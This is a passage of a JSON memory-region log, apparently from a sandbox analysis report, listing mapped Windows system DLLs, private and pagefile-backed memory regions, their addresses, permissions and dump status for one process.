"dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 135168, "start_va": 1937702912, "type": "region", "version": 1 }, "end_va": 1937838079, "entry_point": 1937702912, "filename": "\\Windows\\System32\\ntmarta.dll", "id": "region_859", "name": "ntmarta.dll", "norm_filename": "c:\\windows\\system32\\ntmarta.dll", "region_type": "memory_mapped_file", "start_va": 1937702912, "timestamp": "00:00:47.476", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 282624, "start_va": 1994326016, "type": "region", "version": 1 }, "end_va": 1994608639, "entry_point": 1994326016, "filename": "\\Windows\\System32\\Wldap32.dll", "id": "region_860", "name": "wldap32.dll", "norm_filename": "c:\\windows\\system32\\wldap32.dll", "region_type": "memory_mapped_file", "start_va": 1994326016, "timestamp": "00:00:47.477", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 18612224, "type": "region", "version": 1 }, "end_va": 18616319, "entry_point": 0, "filename": null, "id": "region_861", "name": "pagefile_0x00000000011c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 18612224, "timestamp": "00:00:47.509", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 151552, "start_va": 19005440, "type": "region", "version": 1 }, "end_va": 19156991, "entry_point": 19005440, "filename": "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000017.db", "id": "region_862", "name": "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db", "region_type": "memory_mapped_file", "start_va": 19005440, "timestamp": "00:00:47.509", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 23396352, "type": "region", "version": 1 }, "end_va": 27537407, "entry_point": 0, "filename": null, "id": "region_863", "name": "pagefile_0x0000000001650000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 23396352, "timestamp": "00:00:47.509", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1965293568, "type": "region", "version": 1 }, "end_va": 1965367295, "entry_point": 1965293568, "filename": "\\Windows\\System32\\devobj.dll", "id": "region_864", "name": "devobj.dll", "norm_filename": "c:\\windows\\system32\\devobj.dll", "region_type": "memory_mapped_file", "start_va": 1965293568, "timestamp": "00:00:47.509", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 159744, "start_va": 1966538752, "type": "region", "version": 1 }, "end_va": 1966698495, "entry_point": 1966538752, "filename": "\\Windows\\System32\\cfgmgr32.dll", "id": "region_865", "name": "cfgmgr32.dll", "norm_filename": "c:\\windows\\system32\\cfgmgr32.dll", "region_type": "memory_mapped_file", "start_va": 1966538752, "timestamp": "00:00:47.509", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1691648, "start_va": 1989214208, "type": "region", "version": 1 }, "end_va": 1990905855, "entry_point": 1989214208, "filename": "\\Windows\\System32\\setupapi.dll", "id": "region_866", "name": "setupapi.dll", "norm_filename": "c:\\windows\\system32\\setupapi.dll", "region_type": "memory_mapped_file", "start_va": 1989214208, "timestamp": "00:00:47.509", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 311296, "start_va": 1898053632, "type": "region", "version": 1 }, "end_va": 1898364927, "entry_point": 1898053632, "filename": "\\Windows\\System32\\apphelp.dll", "id": "region_867", "name": "apphelp.dll", "norm_filename": "c:\\windows\\system32\\apphelp.dll", "region_type": "memory_mapped_file", "start_va": 1898053632, "timestamp": "00:00:47.532", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 188416, "start_va": 1860698112, "type": "region", "version": 1 }, "end_va": 1860886527, "entry_point": 1860698112, "filename": "\\Windows\\System32\\shdocvw.dll", "id": "region_868", "name": "shdocvw.dll", "norm_filename": "c:\\windows\\system32\\shdocvw.dll", "region_type": "memory_mapped_file", "start_va": 1860698112, "timestamp": "00:00:47.534", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000869-addr_0x0000000001250000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_125", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 19202048, "type": "region", "version": 1 }, "end_va": 19464191, "entry_point": 0, "filename": null, "id": "region_869", "name": "private_0x0000000001250000", "norm_filename": null, "region_type": "private_memory", "start_va": 19202048, "timestamp": "00:00:47.597", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000870-addr_0x0000000001a50000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_126", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 27590656, "type": "region", "version": 1 }, "end_va": 28639231, "entry_point": 0, "filename": null, "id": "region_870", "name": "private_0x0000000001a50000", "norm_filename": null, "region_type": "private_memory", "start_va": 27590656, "timestamp": "00:00:47.597", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000871-addr_0x0000000001be0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_127", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 29229056, "type": "region", "version": 1 }, "end_va": 29491199, "entry_point": 0, "filename": null, "id": "region_871", "name": "private_0x0000000001be0000", "norm_filename": null, "region_type": "private_memory", "start_va": 29229056, "timestamp": "00:00:47.597", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1860632576, "type": "region", "version": 1 }, "end_va": 1860669439, "entry_point": 1860632576, "filename": "\\Windows\\System32\\linkinfo.dll", "id": "region_872", "name": "linkinfo.dll", "norm_filename": "c:\\windows\\system32\\linkinfo.dll", "region_type": "memory_mapped_file", "start_va": 1860632576, "timestamp": "00:00:47.597", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000873-addr_0x000000007ffdc000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_128", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147336192, "type": "region", "version": 1 }, "end_va": 2147340287, "entry_point": 0, "filename": null, "id": "region_873", "name": "private_0x000000007ffdc000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147336192, "timestamp": "00:00:47.598", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000874-addr_0x000000007ffdd000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_129", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147340288, "type": "region", "version": 1 }, "end_va": 2147344383, "entry_point": 0, "filename": null, "id": "region_874", "name": "private_0x000000007ffdd000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147340288, "timestamp": "00:00:47.598", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 2818048, "type": "region", "version": 1 }, "end_va": 2834431, "entry_point": 2818048, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db", "id": "region_875", "name": "cversions.2.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db", "region_type": "memory_mapped_file", "start_va": 2818048, "timestamp": "00:00:47.618", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 18677760, "type": "region", "version": 1 }, "end_va": 18694143, "entry_point": 18677760, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db", "id": "region_876", "name": "cversions.2.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db", "region_type": "memory_mapped_file", "start_va": 18677760, "timestamp": "00:00:47.618", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 196608, "start_va": 19464192, "type": "region", "version": 1 }, "end_va": 19660799, "entry_point": 19464192, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000009.db", "id": "region_877", "name": "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db", "region_type": "memory_mapped_file", "start_va": 19464192, "timestamp": "00:00:47.618", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 417792, "start_va": 28639232, "type": "region", "version": 1 }, "end_va": 29057023, "entry_point": 28639232, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db", "id": "region_878", "name": "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db", "region_type": "memory_mapped_file", "start_va": 28639232, "timestamp": "00:00:47.618", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 458752, "start_va": 1877016576, "type": "region", "version": 1 }, "end_va": 1877475327, "entry_point": 1877016576, "filename": "\\Windows\\System32\\ntshrui.dll", "id": "region_879", "name": "ntshrui.dll", "norm_filename": "c:\\windows\\system32\\ntshrui.dll", "region_type": "memory_mapped_file", "start_va": 1877016576, "timestamp": "00:00:47.618", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1962147840, "type": "region", "version": 1 }, "end_va": 1962250239, "entry_point": 1962147840, "filename": "\\Windows\\System32\\srvcli.dll", "id": "region_880", "name": "srvcli.dll", "norm_filename": "c:\\windows\\system32\\srvcli.dll", "region_type": "memory_mapped_file", "start_va": 1962147840, "timestamp": "00:00:47.619", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000881-addr_0x0000000001da0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_130", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 31064064, "type": "region", "version": 1 }, "end_va": 31326207, "entry_point": 0, "filename": null, "id": "region_881", "name": "private_0x0000000001da0000", "norm_filename": null, "region_type": "private_memory", "start_va": 31064064, "timestamp": "00:00:47.622", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 45056, "start_va": 1877475328, "type": "region", "version": 1 }, "end_va": 1877520383, "entry_point": 1877475328, "filename": "\\Windows\\System32\\cscapi.dll", "id": "region_882", "name": "cscapi.dll", "norm_filename": "c:\\windows\\system32\\cscapi.dll", "region_type": "memory_mapped_file", "start_va": 1877475328, "timestamp": "00:00:47.622", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000883-addr_0x000000007ffda000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_131", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147328000, "type": "region", "version": 1 }, "end_va": 2147332095, "entry_point": 0, "filename": null, "id": "region_883", "name": "private_0x000000007ffda000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147328000, "timestamp": "00:00:47.622", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1933967360, "type": "region", "version": 1 }, "end_va": 1934008319, "entry_point": 1933967360, "filename": "\\Windows\\System32\\slc.dll", "id": "region_884", "name": "slc.dll", "norm_filename": "c:\\windows\\system32\\slc.dll", "region_type": "memory_mapped_file", "start_va": 1933967360, "timestamp": "00:00:47.623", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 1955659776, "type": "region", "version": 1 }, "end_va": 1955901439, "entry_point": 1955659776, "filename": "\\Windows\\System32\\rsaenh.dll", "id": "region_885", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\system32\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1955659776, "timestamp": "00:00:47.645", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1958150144, "type": "region", "version": 1 }, "end_va": 1958240255, "entry_point": 1958150144, "filename": "\\Windows\\System32\\cryptsp.dll", "id": "region_886", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\system32\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1958150144, "timestamp": "00:00:47.645", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 499712, "start_va": 1673920512, "type": "region", "version": 1 }, "end_va": 1674420223, "entry_point": 1673920512, "filename": "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll", "id": "region_887", "name": "mscoreei.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll", "region_type": "memory_mapped_file", "start_va": 1673920512, "timestamp": "00:00:47.656", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 19660800, "type": "region", "version": 1 }, "end_va": 19664895, "entry_point": 0, "filename": null, "id": "region_888", "name": "pagefile_0x00000000012c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 19660800, "timestamp": "00:00:47.844", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000889-addr_0x0000000001c80000-size_0x0000000000040000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_132", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 29884416, "type": "region", "version": 1 }, "end_va": 30146559, "entry_point": 0, "filename": null, "id": "region_889", "name": "private_0x0000000001c80000", "norm_filename": null, "region_type": "private_memory", "start_va": 29884416, "timestamp": "00:00:47.845", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 5943296, "start_va": 1662386176, "type": "region", "version": 1 }, "end_va": 1668329471, "entry_point": 1662386176, "filename": "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorwks.dll", "id": "region_890", "name": "mscorwks.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorwks.dll", "region_type": "memory_mapped_file", "start_va": 1662386176, "timestamp": "00:00:47.845", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 634880, "start_va": 1854799872, "type": "region", "version": 1 }, "end_va": 1855434751, "entry_point": 1854799872, "filename": "\\Windows\\winsxs\\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\\msvcr80.dll", "id": "region_891", "name": "msvcr80.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\\msvcr80.dll", "region_type": "memory_mapped_file", "start_va": 1854799872, "timestamp": "00:00:47.985", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 19726336, "type": "region", "version": 1 }, "end_va": 19730431, "entry_point": 0, "filename": null, "id": "region_892", "name": "pagefile_0x00000000012d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 19726336, "timestamp": "00:00:48.331", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 19791872, "type": "region", "version": 1 }, "end_va": 19795967, "entry_point": 0, "filename": null, "id": "region_893", "name": "pagefile_0x00000000012e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 19791872, "timestamp": "00:00:48.331", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000894-addr_0x00000000012f0000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_133", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 19857408, "type": "region", "version": 1 }, "end_va": 19922943, "entry_point": 0, "filename": null, "id": "region_894", "name": "private_0x00000000012f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 19857408, "timestamp": "00:00:48.331", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000895-addr_0x0000000001300000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_134", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 19922944, "type": "region", "version": 1 }, "end_va": 19988479, "entry_point": 0, "filename": null, "id": "region_895", "name": "private_0x0000000001300000", "norm_filename": null, "region_type": "private_memory", "start_va": 19922944, "timestamp": "00:00:48.331", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000896-addr_0x0000000001350000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_135", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 20250624, "type": "region", "version": 1 }, "end_va": 20316159, "entry_point": 0, "filename": null, "id": "region_896", "name": "private_0x0000000001350000", "norm_filename": null, "region_type": "private_memory", "start_va": 20250624, "timestamp": "00:00:48.332", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000897-addr_0x0000000001360000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_136", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 20316160, "type": "region", "version": 1 }, "end_va": 20381695, "entry_point": 0, "filename": null, "id": "region_897", "name": "private_0x0000000001360000", "norm_filename": null, "region_type": "private_memory", "start_va": 20316160, "timestamp": "00:00:48.332", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000898-addr_0x0000000001bc0000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_137", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 29097984, "type": "region", "version": 1 }, "end_va": 29163519, "entry_point": 0, "filename": null, "id": "region_898", "name": "private_0x0000000001bc0000", "norm_filename": null, "region_type": "private_memory", "start_va": 29097984, "timestamp": "00:00:48.333", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000899-addr_0x0000000001bd0000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_138", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 29163520, "type": "region", "version": 1 }, "end_va": 29229055, "entry_point": 0, "filename": null, "id": "region_899", "name": "private_0x0000000001bd0000", "norm_filename": null, "region_type": "private_memory", "start_va": 29163520, "timestamp": "00:00:48.333", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000900-addr_0x0000000001cc0000-size_0x00000000000a0000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_139", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 655360, "start_va": 30146560, "type": "region", "version": 1 }, "end_va": 30801919, "entry_point": 0, "filename": null, "id": "region_900", "name": "private_0x0000000001cc0000", "norm_filename": null, "region_type": "private_memory", "start_va": 30146560, "timestamp": "00:00:48.333", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000901-addr_0x0000000001d80000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_140", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 30932992, "type": "region", "version": 1 }, "end_va": 30998527, "entry_point": 0, "filename": null, "id": "region_901", "name": "private_0x0000000001d80000", "norm_filename": null, "region_type": "private_memory", "start_va": 30932992, "timestamp": "00:00:48.334", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000902-addr_0x0000000001ee0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_141", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 32374784, "type": "region", "version": 1 }, "end_va": 32636927, "entry_point": 0, "filename": null, "id": "region_902", "name": "private_0x0000000001ee0000", "norm_filename": null, "region_type": "private_memory", "start_va": 32374784, "timestamp": "00:00:48.334", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 33554432, "start_va": 32636928, "type": "region", "version": 1 }, "end_va": 66191359, "entry_point": 0, "filename": null, "id": "region_903", "name": "private_0x0000000001f20000", "norm_filename": null, "region_type": "private_memory", "start_va": 32636928, "timestamp": "00:00:48.335", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000904-addr_0x0000000003fc0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_142", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 66846720, "type": "region", "version": 1 }, "end_va": 67108863, "entry_point": 0, "filename": null, "id": "region_904", "name": "private_0x0000000003fc0000", "norm_filename": null, "region_type": "private_memory", "start_va": 66846720, "timestamp": "00:00:48.335", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 11501568, "start_va": 1640169472, "type": "region", "version": 1 }, "end_va": 1651671039, "entry_point": 1640169472, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\mscorlib\\62a0b3e4b40ec0e8c5cfaa0c8848e64a\\mscorlib.ni.dll", "id": "region_905", "name": "mscorlib.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\mscorlib\\62a0b3e4b40ec0e8c5cfaa0c8848e64a\\mscorlib.ni.dll", "region_type": "memory_mapped_file", "start_va": 1640169472, "timestamp": "00:00:48.335", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000906-addr_0x000000007ffd8000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_143", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147319808, "type": "region", "version": 1 }, "end_va": 2147323903, "entry_point": 0, "filename": null, "id": "region_906", "name": "private_0x000000007ffd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147319808, "timestamp": "00:00:48.339", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000907-addr_0x000000007ffd9000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_144", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147323904, "type": "region", "version": 1 }, "end_va": 2147327999, "entry_point": 0, "filename": null, "id": "region_907", "name": "private_0x000000007ffd9000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147323904, "timestamp": "00:00:48.339", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000908-addr_0x0000000001c20000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_145", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 29491200, "type": "region", "version": 1 }, "end_va": 29556735, "entry_point": 0, "filename": null, "id": "region_908", "name": "private_0x0000000001c20000", "norm_filename": null, "region_type": "private_memory", "start_va": 29491200, "timestamp": "00:00:49.079", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 3022848, "start_va": 67108864, "type": "region", "version": 1 }, "end_va": 70131711, "entry_point": 67108864, "filename": "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", "id": "region_909", "name": "system.management.automation.dll", "norm_filename": "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll", "region_type": "memory_mapped_file", "start_va": 67108864, "timestamp": "00:00:49.080", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 7979008, "start_va": 1632174080, "type": "region", "version": 1 }, "end_va": 1640153087, "entry_point": 1632174080, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System\\9e0a3b9b9f457233a335d7fba8f95419\\System.ni.dll", "id": "region_910", "name": "system.ni.dll", "norm_filename": 